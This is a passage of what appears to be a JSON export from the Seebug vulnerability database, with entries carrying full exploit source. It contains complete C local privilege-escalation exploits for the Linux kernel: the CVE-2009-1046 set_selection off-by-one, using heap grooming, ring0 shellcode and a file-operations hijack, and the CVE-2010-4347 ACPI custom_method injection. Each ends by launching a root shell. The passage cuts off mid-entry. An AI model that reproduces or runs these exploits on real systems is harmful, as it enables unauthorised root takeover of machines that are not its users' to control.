0\\n"); \r\n bindcpu(); \r\n\r\n __msg("[**] Start Server Thread..\\n");\r\n child = start_listener();\r\n sleep(3); \r\n \r\n do_socks(&server_s, zstream);\r\n for(i=0; i<7; i++)\r\n {\r\n close(g_array[8-1-i]); \r\n }\r\n clr(1); \r\n alloc_tioclinux(); // trigger overflow\r\n peerx = create_and_init();\r\n connect_peer(peerx, &server_s);\r\n peery = create_and_init();\r\n connect_peer(peery, &server_s);\r\n \r\n sleep(1);\r\n\r\n unsafe_fd[0] = peerx;\r\n unsafe_fd[1] = g_array[8];\r\n unsafe_fd[2] = peery;\r\n unsafe_fd[3] = g_array[9];\r\n \r\n __msg("\\n"); \r\n __msg_f("[**] Umapped end-to-end fd: %d\\n", fd_zmap_srv); \r\n __msg_f("[**] Unsafe fd: ( ");\r\n\r\n for(i=0; i<4; i++)\r\n __msg_f("%d ", unsafe_fd[i]);\r\n __msg(")\\n"); \r\n \r\n\r\n __msg("[**] Hijacking fops...\\n");\r\n overwrite_fops(fd_zmap_srv, &caddr, peery);\r\n\r\n /* if u get here.. something nasty happens...may crash..*/\r\n __free_stuff();\r\n __msg("[**] Exploit failed.. freezing process\\n");\r\n kill(getpid(), SIGSTOP);\r\n return 0;\r\n}\r\n\r\n#endif\r\n\r\n// milw0rm.com [2009-07-09]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-66685", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:46:05", "description": "No description provided by source.", "cvss3": {}, "published": "2009-07-10T00:00:00", "type": "seebug", "title": "Linux Kernel <= 2.6.28.3 set_selection() UTF-8 Off By One Local Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1046"], "modified": "2009-07-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11780", "id": "SSV:11780", "sourceData": "\n /* CVE-2009-1046 Virtual Console UTF-8 set_selection() off-by-one(two) Memory Corruption\r\n * Linux Kernel <= 2.6.28.3 \r\n *\r\n * coded by: sgrakkyu <at> antifork.org\r\n * http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html\r\n *\r\n * Dedicated to all people talking nonsense about non exploitability of kernel heap off-by-one overflow\r\n *\r\n * NOTE-1: you need a virtual console attached to the standard output (stdout) \r\n * - physical login\r\n * - ptrace() against some process with the same uid already attached to a VC\r\n * - remote management ..\r\n *\r\n * NOTE-2: UTF-8 character used is: U+253C - it seems to be supported in most standard console fonts\r\n * but if it's _not_: change it (and change respectively STREAM_ZERO and STREAM_ZERO_ALT defines)\r\n * If you use an unsupported character expect some sort of recursive fatal ooops:)\r\n *\r\n * Designed to be built as x86-64 binary only (SLUB ONLY)\r\n * SCTP stack has to be available\r\n * \r\n * Tested on target:\r\n * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)\r\n * Ubuntu 8.10 x86_64 (2.6.27_7-10 genric/server)\r\n * Fedora Core 10 x86_64 (default installed kernel - without selinux)\r\n *\r\n */\r\n\r\n\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sched.h>\r\n#include <errno.h>\r\n#include <netinet/in.h>\r\n#include <netinet/sctp.h>\r\n#include <arpa/inet.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <sys/ioctl.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <linux/tiocl.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <signal.h>\r\n#include <sys/mman.h>\r\n#include <sched.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n\r\n#ifndef __x86_64__\r\n#error "Architecture Unsupported"\r\n#error "This code was written for x86-64 target and has to be built as x86-64 binary"\r\n#else\r\n\r\n#ifndef __u8\r\n#define __u8 uint8_t\r\n#endif\r\n#ifndef __u16\r\n#define __u16 uint16_t\r\n#endif\r\n#ifndef __u32\r\n#define __u32 uint32_t\r\n#endif\r\n#ifndef __u64 \r\n#define __u64 uint64_t\r\n#endif\r\n\r\n\r\n#define STREAM_ZERO 10\r\n#define STREAM_ZERO_ALT 12\r\n\r\n#define SCTP_STREAM 22\r\n#define STACK_SIZE 0x1000\r\n#define PAGE_SIZE 0x1000\r\n#define STRUCT_PAGE 0x0000000000000000\r\n#define STRUCT_PAGE_ALT 0x0000000100000000 \r\n#define CODE_PAGE 0x0000000000010000\r\n#define LOCALHOST "127.0.0.1"\r\n#define KMALLOC "kmalloc-128"\r\n#define TIMER_LIST_FOPS "timer_list_fops"\r\n\r\n#define __msg_f(format, args...) \\\r\n do { fprintf(stdout, format, ## args); } while(0)\r\n\r\n#define __msg(msg) \\\r\n do { fprintf(stdout, "%s", msg); } while(0)\r\n\r\n#define __fatal_errno(msg) \\\r\ndo { perror(msg); __free_stuff(); exit(1); } while(0)\r\n\r\n#define __fatal(msg) \\\r\ndo { fprintf(stderr, msg); __free_stuff(); exit(1); } while(0)\r\n\r\n\r\n\r\n#define CJUMP_OFF 13\r\nchar ring0[]=\r\n"\\x57" // push %rdi\r\n"\\x50" // push %rax\r\n"\\x65\\x48\\x8b\\x3c\\x25\\x00\\x00\\x00\\x00" // mov %gs:0x0,%rdi\r\n"\\x48\\xb8\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41" // mov xxx, %rax\r\n"\\xff\\xd0" // callq *%rax\r\n"\\x58" // pop %rax\r\n"\\x5f" // pop %rdi\r\n"\\xc3"; // retq\r\n\r\n\r\n/* conn struct */\r\nstatic __u16 srvport;\r\nstruct sockaddr_in server_s;\r\nstatic struct sockaddr_in caddr;\r\n\r\n/* some fds.. */\r\nstatic int g_array[10];\r\nstatic int fd_zmap_srv=-1;\r\nstatic int kmalloc_fd=-1;\r\nstatic int unsafe_fd[4] = {-1,-1,-1,-1}; \r\n\r\n/* misc */\r\nstatic int dorec = 0, cankill=1, highpage=0;\r\nstatic char cstack[STACK_SIZE*2];\r\nstatic __u16 zstream=STREAM_ZERO;\r\nstatic __u32 uid,gid;\r\nstatic __u64 fops;\r\nstatic pid_t child=0;\r\nstatic char symbuf[20000];\r\n\r\nstatic void __free_stuff()\r\n{\r\n int i;\r\n for(i=3; i<2048; i++) \r\n {\r\n if((unsafe_fd[0] == i || unsafe_fd[1] == i || \r\n unsafe_fd[2] == i || unsafe_fd[3] == i))\r\n continue; \r\n\r\n close(i);\r\n }\r\n}\r\n\r\nstatic void bindcpu()\r\n{\r\n cpu_set_t set;\r\n CPU_ZERO(&set);\r\n CPU_SET(0, &set);\r\n \r\n if(sched_setaffinity(0, sizeof(cpu_set_t), &set) < 0)\r\n __fatal_errno("setaffinity");\r\n}\r\n\r\n/* parse functions are not bof-free:) */\r\nstatic __u64 get_fops_addr()\r\n{\r\n FILE* stream;\r\n char fbuf[256];\r\n char addr[32];\r\n \r\n stream = fopen("/proc/kallsyms", "r");\r\n if(stream < 0)\r\n __fatal_errno("open: kallsyms");\r\n\r\n memset(fbuf, 0x00, sizeof(fbuf));\r\n while(fgets(fbuf, 256, stream) > 0)\r\n {\r\n char *p = fbuf;\r\n char *a = addr;\r\n memset(addr, 0x00, sizeof(addr));\r\n fbuf[strlen(fbuf)-1] = 0;\r\n while(*p != ' ')\r\n *a++ = *p++; \r\n p += 3;\r\n if(!strcmp(p, TIMER_LIST_FOPS))\r\n return strtoul(addr, NULL, 16); \r\n }\r\n\r\n return 0;\r\n}\r\n\r\nstatic int get_total_object(int fd)\r\n{\r\n char name[32];\r\n char used[32];\r\n char total[32];\r\n char *ptr[] = {name, used, total};\r\n int ret,i,toread=sizeof(symbuf)-1;\r\n char *p = symbuf;\r\n\r\n lseek(fd, 0, SEEK_SET);\r\n memset(symbuf, 0x00, sizeof(symbuf));\r\n while( (ret = read(fd, p, toread)) > 0)\r\n {\r\n p += ret; \r\n toread -= ret;\r\n }\r\n\r\n p = symbuf;\r\n do\r\n {\r\n for(i=0; i<sizeof(ptr)/sizeof(void*); i++)\r\n {\r\n char *d = ptr[i];\r\n while(*p != ' ')\r\n *d++ = *p++; \r\n *d = 0;\r\n while(*p == ' ')\r\n p++;\r\n }\r\n \r\n while(*p++ != '\\n');\r\n \r\n if(!strcmp(KMALLOC, name))\r\n return atoi(total); \r\n\r\n } while(*p != 0);\r\n return 0;\r\n}\r\n\r\n\r\nstatic void ring0c(void* t)\r\n{\r\n int i;\r\n __u32 *p = t;\r\n for(i=0; i<1100; i++,p++)\r\n {\r\n if(p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid &&\r\n p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid)\r\n {\r\n p[0] = p[1] = p[2] = p[3] = 0;\r\n p[4] = p[5] = p[6] = p[7] = 0;\r\n /* dont care about caps */\r\n break;\r\n }\r\n }\r\n}\r\n\r\n\r\nstatic int get_kmalloc_fd()\r\n{\r\n int fd;\r\n fd = open("/proc/slabinfo", O_RDONLY);\r\n if(fd < 0)\r\n __fatal_errno("open: slabinfo");\r\n return fd;\r\n}\r\n\r\n\r\nstatic int write_sctp(int fd, struct sockaddr_in *s, int channel)\r\n{\r\n int ret;\r\n ret = sctp_sendmsg(fd, "a", 1,\r\n (struct sockaddr *)s, sizeof(struct sockaddr_in),\r\n 0, 0, channel, 0 ,0);\r\n return ret;\r\n}\r\n\r\n\r\nstatic void set_sctp_sock_opt(int fd, __u16 in, __u16 out)\r\n{\r\n struct sctp_initmsg msg;\r\n int val=1;\r\n socklen_t len_sctp = sizeof(struct sctp_initmsg);\r\n getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);\r\n msg.sinit_num_ostreams=out; \r\n msg.sinit_max_instreams=in;\r\n setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);\r\n setsockopt(fd, SOL_SCTP, SCTP_NODELAY, (char*)&val, sizeof(val));\r\n}\r\n\r\n\r\nstatic int create_and_init(void)\r\n{\r\n int fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\r\n if(fd < 0)\r\n __fatal_errno("socket: sctp");\r\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM);\r\n return fd;\r\n}\r\n\r\n\r\nstatic void connect_peer(int fd, struct sockaddr_in *s)\r\n{ \r\n int ret;\r\n ret = connect(fd, (struct sockaddr *)s, sizeof(struct sockaddr_in));\r\n if(ret < 0)\r\n __fatal_errno("connect: one peer");\r\n}\r\n\r\n\r\nstatic void conn_and_write(int fd, struct sockaddr_in *s, __u16 stream)\r\n{\r\n connect_peer(fd,s);\r\n write_sctp(fd, s, stream);\r\n}\r\n\r\n\r\nstatic int clone_thread(void*useless)\r\n{\r\n int o = 1;\r\n int c=0,idx=0;\r\n int fd, ret;\r\n struct sockaddr_in tmp;\r\n socklen_t len;\r\n\r\n bindcpu();\r\n server_s.sin_family = PF_INET;\r\n server_s.sin_port = htons(srvport); \r\n server_s.sin_addr.s_addr = inet_addr(LOCALHOST);\r\n\r\n fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\r\n if(fd < 0)\r\n return -1;\r\n\r\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM); \r\n setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o));\r\n\r\n ret = bind(fd, (struct sockaddr *)&server_s, sizeof(struct sockaddr_in));\r\n if(ret < 0)\r\n return -1;\r\n\r\n ret = listen(fd, 100);\r\n if(ret < 0)\r\n return -1;\r\n\r\n len = sizeof(struct sockaddr_in);\r\n while((ret = accept(fd, (struct sockaddr *)&tmp, &len)) >= 0)\r\n {\r\n if(dorec != 0 && c >= dorec && idx < 10)\r\n {\r\n g_array[idx] = ret;\r\n if(idx==9)\r\n {\r\n fd_zmap_srv = ret;\r\n caddr = tmp;\r\n break;\r\n }\r\n idx++;\r\n }\r\n c++; \r\n write_sctp(ret, &tmp, zstream);\r\n }\r\n \r\n sleep(1);\r\n return 0; \r\n}\r\n\r\n\r\nstatic int do_mmap(unsigned long base, int npages)\r\n{\r\n void*addr = mmap((void*)base, PAGE_SIZE*npages,\r\n PROT_READ|PROT_WRITE|PROT_EXEC, \r\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);\r\n\r\n if(MAP_FAILED == addr)\r\n return -1;\r\n\r\n memset(addr, 0x00, PAGE_SIZE*npages);\r\n \r\n return 0;\r\n}\r\n\r\npid_t start_listener()\r\n{\r\n pid_t pid;\r\n pid = clone(clone_thread, cstack+STACK_SIZE-8, \r\n CLONE_VM|CLONE_FILES|SIGCHLD, NULL);\r\n \r\n return pid;\r\n} \r\n\r\nstatic void do_socks(struct sockaddr_in *s, __u16 stream)\r\n{\r\n int i,fd;\r\n int n_objs = get_total_object(kmalloc_fd), tmp_n_objs;\r\n int next=8;\r\n\r\n for(i=0; next != 0; i++)\r\n {\r\n fd = create_and_init();\r\n\r\n tmp_n_objs = get_total_object(kmalloc_fd); \r\n if(!dorec && tmp_n_objs != n_objs)\r\n dorec=i; \r\n\r\n conn_and_write(fd, s, stream);\r\n if(dorec)\r\n next--;\r\n }\r\n}\r\n\r\n\r\nstatic void clr(int fd)\r\n{\r\n /* use termcap instead..*/\r\n write(fd, "\\33[H\\33[J", 6); \r\n}\r\n\r\nstatic char tiobuffer[2048];\r\nvoid alloc_tioclinux()\r\n{\r\n int i;\r\n char out[128*3];\r\n /* Unicode Character 'BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL' (U+253C) */\r\n char utf8[3] = { 0xE2, 0x94, 0xBC }; \r\n //char utf8[3] = { 0xE2, 0x80, 0xBC }; \r\n struct tiocl_selection *sel;\r\n char *t;\r\n void *v = malloc(sizeof(struct tiocl_selection) + 1);\r\n t = (char*)v; \r\n sel = (struct tiocl_selection *)(t+1);\r\n memset(out, 0x41, sizeof(out)); \r\n for(i=0; i<128; i++) \r\n {\r\n tiobuffer[(i*3)]=utf8[0];\r\n tiobuffer[(i*3)+1]=utf8[1];\r\n tiobuffer[(i*3)+2]=utf8[2];\r\n }\r\n\r\n *t = TIOCL_SETSEL;\r\n sel->xs = 1;\r\n sel->ys = 1;\r\n sel->xe = 43;\r\n //sel->xe = 42; /* no overflow */\r\n sel->ye = 1;\r\n \r\n write(1, tiobuffer, sizeof(tiobuffer));\r\n if(ioctl(1, TIOCLINUX, v) < 0)\r\n __fatal("[!!] Unable to call TIOCLINUX ioctl(), need stdout to be on a virtual console\\n");\r\n}\r\n\r\n\r\n\r\nstatic void migrate_evil_fd()\r\n{\r\n int i;\r\n pid_t child;\r\n\r\n __msg("[**] Migrate evil unsafe fds to child process..\\n");\r\n child = fork();\r\n if(!child)\r\n {\r\n\r\n /* preserve evil fds */\r\n setsid(); \r\n if(!cankill) /* cant die .. */\r\n while(1)\r\n sleep(1);\r\n else\r\n {\r\n sleep(10); /* wait execve() before */ \r\n for(i=0; i<4; i++)\r\n close(unsafe_fd[i]); \r\n\r\n exit(1);\r\n }\r\n }\r\n else\r\n {\r\n if(!cankill)\r\n __msg_f("[**] Child process %d _MUST_ NOT die ... keep it alive:)\\n", child);\r\n }\r\n}\r\n\r\n\r\nstatic void trigger_fault()\r\n{\r\n char *argv[]={"/bin/sh", NULL};\r\n int fd,i;\r\n\r\n fd = open("/proc/timer_list", O_RDONLY);\r\n if(fd >= 0)\r\n {\r\n ioctl(fd, 0, 0);\r\n __free_stuff();\r\n migrate_evil_fd();\r\n \r\n for(i=0; i<4; i++)\r\n close(unsafe_fd[i]);\r\n\r\n if(!getuid())\r\n {\r\n __msg("[**] Got root!\\n");\r\n execve("/bin/sh", argv, NULL); \r\n }\r\n }\r\n else\r\n {\r\n __msg("[**] Cannot open /proc/timer_list");\r\n __free_stuff();\r\n }\r\n}\r\n\r\n\r\n\r\nstatic void overwrite_fops( int sender, \r\n struct sockaddr_in *to_receiver,\r\n int receiver)\r\n{\r\n char *p = NULL;\r\n if(!highpage)\r\n p++;\r\n else\r\n p = (void*)STRUCT_PAGE_ALT;\r\n\r\n __u64 *uip = (__u64*)p; \r\n *uip = fops;\r\n write_sctp(sender, to_receiver, 1); \r\n sleep(1);\r\n trigger_fault();\r\n}\r\n\r\nstatic __u16 get_port()\r\n{\r\n __u16 r = (__u16)getpid();\r\n if(r <= 0x400)\r\n r+=0x400;\r\n return r;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n int peerx, peery,i;\r\n __u64 *patch;\r\n\r\n srvport = get_port();\r\n\r\n uid=getuid();\r\n gid=getgid();\r\n fops=get_fops_addr() + 64; \r\n if(!fops)\r\n {\r\n __msg("[!!] Unable to locate symbols...\\n");\r\n return 1;\r\n }\r\n\r\n __msg_f("[**] Patching ring0 shellcode with userspace addr: %p\\n", ring0c);\r\n patch = (__u64*)(ring0 + CJUMP_OFF);\r\n *patch = (__u64)ring0c;\r\n\r\n __msg_f("[**] Using port: %d\\n", srvport);\r\n __msg("[**] Getting slab info...\\n");\r\n kmalloc_fd = get_kmalloc_fd();\r\n if(!get_total_object(kmalloc_fd)) \r\n __fatal("[!!] Only SLUB allocator supported\\n");\r\n \r\n\r\n __msg("[**] Mapping Segments...\\n"); \r\n __msg("[**] Trying mapping safe page...");\r\n if(do_mmap(STRUCT_PAGE, 1) < 0)\r\n {\r\n __msg("Page Protection Present (Unable to Map Safe Page)\\n");\r\n __msg("[**] Mapping High Address Page (dont kill placeholder child)\\n");\r\n if(do_mmap(STRUCT_PAGE_ALT, 1) < 0)\r\n __fatal_errno("mmap"); \r\n\r\n cankill=0; /* dont kill child owning unsafe fds.. */\r\n highpage=1; /* ssnmap in higher pages */\r\n zstream=STREAM_ZERO_ALT; \r\n } \r\n else\r\n __msg("Done\\n");\r\n\r\n __msg("[**] Mapping Code Page... ");\r\n if(do_mmap(CODE_PAGE, 1) < 0)\r\n __fatal_errno("mmap");\r\n else\r\n __msg("Done\\n");\r\n\r\n memcpy((void*)CODE_PAGE, ring0, sizeof(ring0));\r\n\r\n __msg("[**] Binding on CPU 0\\n"); \r\n bindcpu(); \r\n\r\n __msg("[**] Start Server Thread..\\n");\r\n child = start_listener();\r\n sleep(3); \r\n \r\n do_socks(&server_s, zstream);\r\n for(i=0; i<7; i++)\r\n {\r\n close(g_array[8-1-i]); \r\n }\r\n clr(1); \r\n alloc_tioclinux(); // trigger overflow\r\n peerx = create_and_init();\r\n connect_peer(peerx, &server_s);\r\n peery = create_and_init();\r\n connect_peer(peery, &server_s);\r\n \r\n sleep(1);\r\n\r\n unsafe_fd[0] = peerx;\r\n unsafe_fd[1] = g_array[8];\r\n unsafe_fd[2] = peery;\r\n unsafe_fd[3] = g_array[9];\r\n \r\n __msg("\\n"); \r\n __msg_f("[**] Umapped end-to-end fd: %d\\n", fd_zmap_srv); \r\n __msg_f("[**] Unsafe fd: ( ");\r\n\r\n for(i=0; i<4; i++)\r\n __msg_f("%d ", unsafe_fd[i]);\r\n __msg(")\\n"); \r\n \r\n\r\n __msg("[**] Hijacking fops...\\n");\r\n overwrite_fops(fd_zmap_srv, &caddr, peery);\r\n\r\n /* if u get here.. something nasty happens...may crash..*/\r\n __free_stuff();\r\n __msg("[**] Exploit failed.. freezing process\\n");\r\n kill(getpid(), SIGSTOP);\r\n return 0;\r\n}\r\n\r\n#endif\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11780", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:06:46", "description": "No description provided by source.", "published": "2010-12-19T00:00:00", "type": "seebug", "title": "Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4347"], "modified": "2010-12-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20296", "id": "SSV:20296", "sourceData": "\n /*\r\n * american-sign-language.c\r\n *\r\n * Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347\r\n *\r\n * This custom_method file allows to inject custom ACPI methods into the ACPI\r\n * interpreter tables. This control file was introduced with world writeable\r\n * permissions in Linux Kernel 2.6.33.\r\n *\r\n * Usage:\r\n *\r\n * $ gcc american-sign-language.c -o american-sign-language\r\n * $ ./american-sign-language\r\n * [+] resolving required symbols...\r\n * [+] checking for world-writable custom_method...\r\n * [+] checking for an ACPI LID device...\r\n * [+] poisoning ACPI tables via custom_method...\r\n * [+] triggering ACPI payload via LID device...\r\n * [+] triggering exploit via futimesat...\r\n * [+] launching root shell!\r\n * # id\r\n * uid=0(root) gid=0(root) groups=0(root)\r\n *\r\n * Notes:\r\n *\r\n * This vuln allows us to write custom ACPI methods and load them into the\r\n * kernel as an unprivileged user. We compile some fancy ASL down to AML\r\n * that overrides the ACPI method used when the status of the LID device is\r\n * queried (eg. 'open' or 'closed' lid on a laptop). When the method is\r\n * triggered, it overlays an OperationRegion on the physical address where\r\n * sys_futimesat is located and overwrites the memory via the Store to\r\n * escalate privileges whenever sys_futimesat is called.\r\n *\r\n * The payload is 64-bit only and depends on the existence of a LID device\r\n * (eg. laptop), but the exploit will still tell you if you're vulnerable\r\n * regardless. If you don't know how to work around these limitations, you\r\n * probably shouldn't be running this in the first place. :-P\r\n *\r\n * Props to taviso, spender, kees, bliss, pipacs, twiz, stealth, and #brownpants\r\n */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <limits.h>\r\n#include <inttypes.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/utsname.h>\r\n \r\n/*\r\n * The ASL payload looks like:\r\n *\r\n * DefinitionBlock ("lid.aml", "SSDT", 2, "", "", 0x00001001) {\r\n * Method (\\_SB.LID._LID, 0, NotSerialized) {\r\n * OperationRegion (KMEM, SystemMemory, PHYADDR, 0x392)\r\n * Field(KMEM, AnyAcc, NoLock, Preserve) {\r\n * HACK, 0x392\r\n * }\r\n * Store (Buffer () {\r\n * 0x55, 0x48, 0x89, 0xe5, 0x53, 0x48, 0x83, 0xec,\r\n * 0x08, 0x48, 0xc7, 0xc3, 0x24, 0x24, 0x24, 0x24,\r\n * 0x48, 0xc7, 0xc0, 0x24, 0x24, 0x24, 0x24, 0xbf,\r\n * 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,\r\n * 0xc7, 0xff, 0xd3, 0x48, 0xc7, 0xc0, 0xb7, 0xff,\r\n * 0xff, 0xff, 0x48, 0x83, 0xc4, 0x08, 0x5b, 0xc9,\r\n * 0xc3 }, HACK)\r\n * Return (One)\r\n * }\r\n * }\r\n *\r\n * Feel free to `iasl -d` this is you don't trust me! ;-)\r\n */\r\n#define PAYLOAD_AML \\\r\n"\\x53\\x53\\x44\\x54\\x90\\x00\\x00\\x00\\x02\\x3e\\x00\\x00\\x00\\x00\\x00\\x00" \\\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x10\\x00\\x00\\x49\\x4e\\x54\\x4c" \\\r\n"\\x21\\x05\\x09\\x20\\x14\\x4b\\x06\\x5c\\x2f\\x03\\x5f\\x53\\x42\\x5f\\x4c\\x49" \\\r\n"\\x44\\x5f\\x5f\\x4c\\x49\\x44\\x00\\x5b\\x80\\x4b\\x4d\\x45\\x4d\\x00\\x0c\\xe0" \\\r\n"\\x61\\x17\\x01\\x0b\\x92\\x03\\x5b\\x81\\x0c\\x4b\\x4d\\x45\\x4d\\x00\\x48\\x41" \\\r\n"\\x43\\x4b\\x42\\x39\\x70\\x11\\x34\\x0a\\x31\\x55\\x48\\x89\\xe5\\x53\\x48\\x83" \\\r\n"\\xec\\x08\\x48\\xc7\\xc3\\x24\\x24\\x24\\x24\\x48\\xc7\\xc0\\x24\\x24\\x24\\x24" \\\r\n"\\xbf\\x00\\x00\\x00\\x00\\xff\\xd0\\x48\\x89\\xc7\\xff\\xd3\\x48\\xc7\\xc0\\xb7" \\\r\n"\\xff\\xff\\xff\\x48\\x83\\xc4\\x08\\x5b\\xc9\\xc3\\x48\\x41\\x43\\x4b\\xa4\\x01"\r\n#define PAYLOAD_LEN 144\r\n \r\n#define CUSTOM_METHOD "/sys/kernel/debug/acpi/custom_method"\r\n#define HEY_ITS_A_LID "/proc/acpi/button/lid/LID/state"\r\n \r\nunsigned long\r\nget_symbol(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[512];\r\n struct utsname ver;\r\n int ret;\r\n int rep = 0;\r\n int oldstyle = 0;\r\n \r\n f = fopen("/proc/kallsyms", "r");\r\n if (f == NULL) {\r\n f = fopen("/proc/ksyms", "r");\r\n if (f == NULL)\r\n goto fallback;\r\n oldstyle = 1;\r\n }\r\n \r\nrepeat:\r\n ret = 0;\r\n while(ret != EOF) {\r\n if (!oldstyle)\r\n ret = fscanf(f, "%p %c %s\\n", (void **)&addr, &dummy, sname);\r\n else {\r\n ret = fscanf(f, "%p %s\\n", (void **)&addr, sname);\r\n if (ret == 2) {\r\n char *p;\r\n if (strstr(sname, "_O/") || strstr(sname, "_S."))\r\n continue;\r\n p = strrchr(sname, '_');\r\n if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n p = p - 4;\r\n while (p > (char *)sname && *(p - 1) == '_')\r\n p--;\r\n *p = '\\0';\r\n }\r\n }\r\n }\r\n if (ret == 0) {\r\n fscanf(f, "%s\\n", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n \r\n fclose(f);\r\n if (rep)\r\n return 0;\r\nfallback:\r\n uname(&ver);\r\n if (strncmp(ver.release, "2.6", 3))\r\n oldstyle = 1;\r\n sprintf(sname, "/boot/System.map-%s", ver.release);\r\n f = fopen(sname, "r");\r\n if (f == NULL)\r\n return 0;\r\n rep = 1;\r\n goto repeat;\r\n}\r\n \r\nint\r\nmain(int argc, char **argv)\r\n{\r\n int ret;\r\n FILE *fp;\r\n char buf[64];\r\n struct stat sb;\r\n char payload[PAYLOAD_LEN] = PAYLOAD_AML;\r\n unsigned long sys_futimesat, prepare_kernel_cred, commit_creds;\r\n \r\n printf("[+] resolving required symbols...\\n");\r\n \r\n sys_futimesat = get_symbol("sys_futimesat");\r\n if (!sys_futimesat) {\r\n printf("[-] sys_futimesat symbol not found, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n prepare_kernel_cred = get_symbol("prepare_kernel_cred");\r\n if (!prepare_kernel_cred) {\r\n printf("[-] prepare_kernel_cred symbol not found, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n commit_creds = get_symbol("commit_creds");\r\n if (!commit_creds) {\r\n printf("[-] commit_creds symbol not found, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] checking for world-writable custom_method...\\n");\r\n \r\n ret = stat(CUSTOM_METHOD, &sb);\r\n if (ret < 0) {\r\n printf("[-] custom_method not found, kernel is not vulnerable!\\n");\r\n exit(1);\r\n }\r\n \r\n if (!(sb.st_mode & S_IWOTH)) {\r\n printf("[-] custom_method not world-writable, kernel is not vulnerable!\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] checking for an ACPI LID device...\\n");\r\n \r\n ret = stat(HEY_ITS_A_LID, &sb);\r\n if (ret < 0) {\r\n printf("[-] ACPI LID device not found, but kernel is still vulnerable!\\n");\r\n exit(1);\r\n }\r\n \r\n if (sizeof(sys_futimesat) != 8) {\r\n printf("[-] payload is 64-bit only, but kernel is still vulnerable!\\n");\r\n exit(1);\r\n }\r\n \r\n sys_futimesat &= ~0xffffffff80000000;\r\n memcpy(&payload[63], &sys_futimesat, 4);\r\n memcpy(&payload[101], &commit_creds, 4);\r\n memcpy(&payload[108], &prepare_kernel_cred, 4);\r\n \r\n printf("[+] poisoning ACPI tables via custom_method...\\n");\r\n \r\n fp = fopen(CUSTOM_METHOD, "w");\r\n fwrite(payload, 1, sizeof(payload), fp);\r\n fclose(fp);\r\n \r\n printf("[+] triggering ACPI payload via LID device...\\n");\r\n \r\n fp = fopen(HEY_ITS_A_LID, "r");\r\n fread(&buf, 1, sizeof(buf), fp);\r\n fclose(fp);\r\n \r\n printf("[+] triggering exploit via futimesat...\\n");\r\n \r\n ret = futimesat(0, "/tmp", NULL);\r\n \r\n if (ret != -1 || errno != EDOTDOT) {\r\n printf("[-] unexpected futimesat errno, exploit failed!\\n");\r\n exit(1);\r\n }\r\n \r\n if (getuid() != 0) {\r\n printf("[-] privileges not escalated, exploit failed!\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] launching root shell!\\n");\r\n execl("/bin/sh", "/bin/sh", NULL);\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20296", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T13:37:25", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4347"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70421", "id": "SSV:70421", "sourceData": "\n /*\r\n * american-sign-language.c\r\n *\r\n * Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation\r\n * Jon 